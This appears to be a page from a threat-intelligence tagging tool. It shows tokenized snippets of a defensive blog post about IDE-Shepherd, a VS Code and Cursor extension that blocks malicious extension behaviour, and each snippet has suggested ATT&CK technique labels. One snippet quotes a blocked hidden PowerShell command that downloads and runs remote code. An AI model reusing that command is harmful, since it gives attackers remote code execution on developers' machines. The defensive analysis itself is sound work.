“##e - shepherd events into their log explorers real - world attack prevention : two case studies let ' s examine how ide - shepherd defends against actual attack patterns observed in the wild. case study 1 : blocking malicious process execution in this attack scenario, a compromi…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1176.002IDE Extensions
94%
“” campaign, a. vscode / tasks. json file auto - ran malicious scripts as soon as a workspace was trusted, underscoring how easily attackers can exploit both extension - based and workspace - based weaknesses in vs code ’ s permissive trust model. meet ide - shepherd : real - time…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1176.002IDE Extensions
91%
“introducing ide - shepherd : your shield against threat actors lurking in your ide in recent years, integrated development environments ( ides ) have become a pivotal component in modern software development, providing essential tools for writing, testing, and debugging code. amo…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1176.002IDE Extensions
90%
“##ed renderer process. extensions run in a separate extension host process that, as per the official documentation, provides a scalable solution with full node. js support. this design grants the extension host unrestricted access to ide apis, workspace settings, and host files. …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1176.002IDE Extensions
82%
“= { ' activate ' : activate, ' deactivate ' : deactivate } ; ide - shepherd ' s child _ process patch intercepts the exec ( ) call before execution and checks its argument against the integrated rules set. the process - analyzer detects the powershell activity and identifies its …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
74%
“process plugin : blocked exec ( ) : powershell - windowstyle hidden - command " irm https : / / niggboo [. ] com / aaa | iex " case study 2 : preventing " contagious interview " task execution in this second case, we take a closer look at a novel ttp used as part of the " contagi…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1176.002IDE Extensions
72%
“##card activations, and signs of obfuscation. 1. run - time defense the monitoring system operates at the node. js layer, instrumenting critical apis to detect and prevent malicious operations : 2. heuristic detection the scanner performs deep metadata analysis of installed exten…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1204.002Malicious File
64%
“code execution through jupyter notebook files ( cve - 2022 - 41034 ) and malicious git repositories ( cve - 2020 - 27955 ). importantly, microsoft does operate a marketplace vetting process that reviews extensions for security issues prior to publication and verifies publishers. …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1176.002IDE Extensions
48%
“cursor, which assign trust to a publisher and then extend that trust to all of the publisher ’ s extensions, ide - shepherd reviews each extension ’ s behavior at runtime. this offers the users granular control over individual plugins and reduces the risk of compromised extension…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
43%
“= { ' activate ' : activate, ' deactivate ' : deactivate } ; ide - shepherd ' s child _ process patch intercepts the exec ( ) call before execution and checks its argument against the integrated rules set. the process - analyzer detects the powershell activity and identifies its …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1176Software Extensions
33%
“##ed renderer process. extensions run in a separate extension host process that, as per the official documentation, provides a scalable solution with full node. js support. this design grants the extension host unrestricted access to ide apis, workspace settings, and host files. …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
IDE-SHEPHERD is an open-source IDE security extension that provides real-time monitoring and protection for VS Code and Cursor. It intercepts malicious process executions, monitors network activity, and blocks dangerous workspace tasks before they can compromise your development environment.